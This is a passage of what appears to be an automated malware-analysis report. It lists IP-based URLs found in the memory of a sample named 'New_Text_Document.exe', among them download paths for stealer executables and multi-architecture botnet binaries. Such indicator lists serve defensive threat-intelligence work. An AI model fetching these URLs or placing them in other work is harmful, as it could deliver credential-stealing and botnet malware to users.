                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.156.51:29752/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.156.67:25378/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.157.129:63350/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.155.192.189:34052/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.209.98.174/ssh1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.232.100.90:44509/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.arm4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.mipsel
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.powerpc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.superh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.123.142.245/lava.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.90.16.5:18437/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.212/12/carryspend.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.212/12/difficultspecificprores.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.212/12/sufferdemand.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.212/carryspend.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.213/1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.213/3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.221/files/Ads.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.221/files/Random.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.226/download/Services.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.226/download/WWW14_64.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.226/download/rise/StealerClient_Cpp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.28.226/download/rise/StealerClient_Sharp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.232.74.6:34685/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.232.98.247:49532/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.234.122.85:59378/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.235.173.243:19443/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.242.46.90:11750/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.115.66.80:16621/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.185.28/350/audiodgse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.6/1535/audiodgse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.208.6/1536/audiodgse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.250.4.71:44703/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.251.148.93:45999/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.162.167.126:64180/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.235.253.239:44493/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.25.113.8:24835/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.30.118.52:56763/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.56.85.8:3822/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.77.221.139:15827/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.8.38.21:26741/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.180.65.21:15346/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.48.183.201:12490/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.83.125.86:9908/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.192.156.220:2463/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.200.208.28:31489/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.201.185.49:31924/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.201.225.177:64253/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.204.204.250:26587/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.206.182.15:49392/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.30.116.177:28289/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.84:8080/4.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.124.161.240:10002/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.126.159.71:51372/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.42.106:7038/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.226.195.48:26422/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.35.217.245:31410/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/x86_32
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.97.210.211/x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.26.35:27567/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.224.220.5:9743/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.81.40.210:40721/.i
